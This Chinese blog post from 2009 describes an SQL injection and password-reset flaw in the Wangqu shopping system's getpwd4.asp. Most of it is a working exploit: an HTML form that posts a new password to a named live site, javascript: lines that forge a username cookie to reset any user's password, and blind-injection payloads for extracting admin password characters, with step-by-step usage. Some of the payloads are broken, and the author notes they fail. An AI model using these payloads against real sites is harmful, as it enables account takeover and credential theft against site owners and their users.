网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入)

2009, December 19, 1:10 AM. 漏洞集研
Submitted by admin

网趣漏洞说明:
最新问题出在getpwd4.asp  这个文件有注射漏洞!

因为程序思路是想接受从上一个设置密码的表单文件中提交过来的变量,不过在这里我们可以不给它提交表单变量,而让它来接受我们设置的cookie,passwd是用request.from 来接受的,所以我们用一下的表单提交。

表单内容:
<form method="post" action="http://www.shouji168.net/getpwd4.asp" >
<!--下面的123456要改成的新密码-->
<input name="passwd" type="text" id="receipt" size="12" value="123456">
<input class=go-wenbenkuang type="submit" value=" 设置密码 " name="submit">
</form>


语句:
改任意用户密码。
javascript:alert(document.cookie="username="+escape("windows")

测试注入:
javascript:alert(document.cookie="username="+escape("windows' and '1'='1"))
javascript:alert(document.cookie="username="+escape("windows' and '1'='2"))

javascript:alert(document.cookie="username="+escape("windows' and (select len(password) from cnhww)>1 and '1'='1"))

javascript:alert(document.cookie="username="+escape("windows' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1"))

利用方式:
比如:第一个改任意用户密码
1: 首先将表单内容保存到本地,随便取个名字,htm的。     
2:然后打开网站http://www.shouji168.net/   在地址栏输入javascript:alert(document.cookie="username="+escape("windows")
(windows是已经有的用户,但是密码不清楚)
3:打开本地的表单,然后点设置密码
4:会出现密码更新成功,就被改为123456

第二个注入:方法更上面一样利用,  当1=1时   同样是会显示密码更新成功,但是等于2时会出现没有注册请到前台注册。

很明显有注入漏洞。

但是在遇到这个站的时候我有点蒙了,

希望大家看下
javascript:alert(document.cookie="username="+escape("windows' and (select top 1 len(password) from admin)>1 and '1'='1"))
执行后  应该存在admin这个表,但是可能语句问题  总出错

但是在猜password的asc码的时候

javascript:alert(document.cookie="username="+escape("windows' and (and (select top 1 asc(mid(password,1,1)) from admin)>107 and '1'='1"))

=========待补充

讨论:http://www.t00ls.net/thread-3751-1-4.html

Tags: 网趣

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):